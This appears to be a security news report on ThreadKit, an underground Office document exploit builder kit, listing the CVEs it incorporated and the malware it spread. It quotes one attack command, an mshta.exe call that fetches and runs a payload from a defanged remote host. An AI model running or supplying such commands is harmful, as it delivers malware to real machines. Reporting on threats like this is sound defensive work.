Newly discovered Microsoft office document exploit kit contains a variety of recent exploits and Malware such as Lokibot, Formbook and tracking kit called such as ThreadKit targeting various organization and individuals around the world.
These Exploits kits are available in restricted underground crime forums and the cybercriminals are selling them at a different price.
They are used to spread a variety of malware payloads such as Trickbot and Chthonic, and RATs such as FormBook and Loki Bot and it also used for more sophisticated cyber attacks.
Also Read: Hackers Illegally Purchasing Abused Code-signing & SSL Certificates From Underground Market
Initially, ThreadKit starts its activities around mid of 2017 with many of powerful exploits such as EXE and DOC files inside of the VBS Script.
It contains an exploited CVE-2017-0199 and download and execute the payload from its command and control server and install the embedded Smoke Loader and Trick banking malware.
During October 2017, ThreadKit Started advertising in the underground forum including with another Exploit CVE 2017-8759.
Later it communicates with C2 server to execute the embedded executable and additionally it integrating the new vulnerabilities.
Also, it using various technique to avoid detection and employee the advance method to avoid detection by modifying the registry key.
Since Nov 2017 ThreadKit starts its aggressive activities and employee with brand new Microsoft Office vulnerabilities.
It Advertised the inclusion of exploits targeting CVE 2017-11882 running un the following command: “mshta.exe hxxps://seliodrones[.]info/vmware/w&\x12\x0cC”
Very recent activities of this Exploit kit in Feb/March contains a very new serious exploit such as Adobe Flash zero-day (CVE-2018-4878) and several new Microsoft Office vulnerabilities.
According to Proofpoint, A new forum post in February 2018 announced that exploits for the recently disclosed CVE-2018-0802, as well as a July 2017 Office vulnerability (CVE-2017-8570), had been added to ThreadKit.
Main Distributing of the large spike of email campaigns with ThreadKit generated MS Office attachments that included these exploits.
“ThreadKit is a relatively new and popular document exploit builder kit that has been used in the wild since at least June 2017, by a variety of actors carrying out both targeted and broad-based crimeware campaigns. This new document exploit builder kit makes the use of the latest Microsoft Office exploits accessible to even low-skilled malicious actors. Proofpoint said.”
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released nine new advisories detailing severe…
Email security solutions are critical for protecting organizations from the growing sophistication of cyber threats…
A new form of phishing attack is making waves among job seekers, as cybercriminals exploit…
Security Operations Centers (SOCs) are facing a mounting crisis: alert fatigue. As cyber threats multiply…
The Sysdig Threat Research Team (TRT) has revealed a significant evolution in the offensive capabilities…
Living-off-the-Land (LOTL) attacks have become a cornerstone of modern cyber threats, allowing malware to evade…
